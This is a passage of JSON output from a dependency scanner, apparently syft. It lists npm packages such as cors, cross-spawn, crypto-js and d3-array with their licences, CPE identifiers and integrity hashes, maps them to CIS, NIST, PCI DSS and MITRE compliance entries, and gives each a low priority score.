"nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8ea7108a43fc0ad4", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: core-util-is 1.0.3", "title": "core-util-is 1.0.3", "description": "Package discovered: core-util-is 1.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9bfb1fb9a1cd315e", "name": "core-util-is", "version": "1.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:core-util-is:core-util-is:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:core-util-is:core_util_is:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:core_util_is:core-util-is:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:core_util_is:core_util_is:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:core-util:core-util-is:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:core-util:core_util_is:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:core_util:core-util-is:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:core_util:core_util_is:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:core:core-util-is:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:core:core_util_is:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/core-util-is@1.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "171e24f79e6f61b0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: cors 2.8.6", "title": "cors 2.8.6", "description": "Package discovered: cors 2.8.6", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c8f0caa18c740c23", "name": "cors", "version": "2.8.6", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:cors:cors:2.8.6:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/cors@2.8.6", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/cors/-/cors-2.8.6.tgz", "integrity": "sha512-tJtZBBHA6vjIAaF6EnIaq6laBBP9aq/Y3ouVJjEfoHbRBcHBAHYcMh/w8LDrk2PvIMMq8gmopa5D4V8RmbrxGw==", "dependencies": { "object-assign": "^4", "vary": "^1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "24841e3ab0fadbb6", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", "startLine": 0 }, "message": "Package discovered: coverallsapp/github-action master", "title": "coverallsapp/github-action master", "description": "Package discovered: coverallsapp/github-action master", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "cbf693155383c51f", "name": "coverallsapp/github-action", "version": "master", "type": "github-action", "foundBy": "github-actions-usage-cataloger", "locations": [ { "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", "accessPath": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "", "cpes": [ { "cpe": "cpe:2.3:a:coverallsapp\\/github-action:coverallsapp\\/github-action:master:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:coverallsapp\\/github-action:coverallsapp\\/github_action:master:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:coverallsapp\\/github_action:coverallsapp\\/github-action:master:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:coverallsapp\\/github_action:coverallsapp\\/github_action:master:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:coverallsapp\\/github:coverallsapp\\/github-action:master:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:coverallsapp\\/github:coverallsapp\\/github_action:master:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:github/coverallsapp/github-action@master", "metadataType": "github-actions-use-statement", "metadata": { "value": "coverallsapp/github-action@master" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c42474dc158d56dd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: cross-fetch 3.2.0", "title": "cross-fetch 3.2.0", "description": "Package discovered: cross-fetch 3.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1ef521ded724ae55", "name": "cross-fetch", "version": "3.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:cross-fetch_project:cross-fetch:3.2.0:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/cross-fetch@3.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/cross-fetch/-/cross-fetch-3.2.0.tgz", "integrity": "sha512-Q+xVJLoGOeIMXZmbUK4HYk+69cQH6LudR0Vu/pRm2YlU/hDV9CiS0gKUMaWY5f2NeUH9C1nV3bsTlCo0FsTV1Q==", "dependencies": { "node-fetch": "^2.7.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ab79d32b8583840a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: cross-spawn 7.0.6", "title": "cross-spawn 7.0.6", "description": "Package discovered: cross-spawn 7.0.6", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "043761526fd95886", "name": "cross-spawn", "version": "7.0.6", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:cross-spawn:cross-spawn:7.0.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cross-spawn:cross_spawn:7.0.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cross_spawn:cross-spawn:7.0.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cross_spawn:cross_spawn:7.0.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cross:cross-spawn:7.0.6:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:cross:cross_spawn:7.0.6:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/cross-spawn@7.0.6", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", "dependencies": { "path-key": "^3.1.0", "shebang-command": "^2.0.0", "which": "^2.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8714b6edd2c6df07", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: crypto-js 4.2.0", "title": "crypto-js 4.2.0", "description": "Package discovered: crypto-js 4.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2eb6177b3fd9fb78", "name": "crypto-js", "version": "4.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:crypto-js:crypto-js:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:crypto-js:crypto_js:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:crypto_js:crypto-js:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:crypto_js:crypto_js:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:crypto:crypto-js:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:crypto:crypto_js:4.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/crypto-js@4.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/crypto-js/-/crypto-js-4.2.0.tgz", "integrity": "sha512-KALDyEYgpY+Rlob/iriUtjV6d5Eq+Y191A5g4UqLAi8CyGP9N1+FdVbkc1SxKc2r4YAYqG8JzO2KGL+AizD70Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5c9f6165bd9afd4d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: cssesc 3.0.0", "title": "cssesc 3.0.0", "description": "Package discovered: cssesc 3.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7ab312baa29fde7a", "name": "cssesc", "version": "3.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:cssesc:cssesc:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/cssesc@3.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz", "integrity": "sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e510323d242254fb", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: csstype 3.2.3", "title": "csstype 3.2.3", "description": "Package discovered: csstype 3.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7a5abc30c1904007", "name": "csstype", "version": "3.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:csstype:csstype:3.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/csstype@3.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/csstype/-/csstype-3.2.3.tgz", "integrity": "sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "bd9d3c33974e198d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: d3-array 3.2.4", "title": "d3-array 3.2.4", "description": "Package discovered: d3-array 3.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d16a22647e62d254", "name": "d3-array", "version": "3.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:d3-array:d3-array:3.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3-array:d3_array:3.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_array:d3-array:3.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3_array:d3_array:3.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3-array:3.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:d3:d3_array:3.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/d3-array@3.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/d3-array/-/d3-array-3.2.4.tgz", "integrity": "sha512-tdQAmyA18i4J7wprpYq8ClcxZy3SC31QMeByyCFyRt7BVHdREQZ5lpzoe5mFEYZUWe+oq8HBvk9JjpibyEV4Jg==", "dependencies": { "internmap": "1 - 2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fe81bed2b7c1ca62", "ruleId": 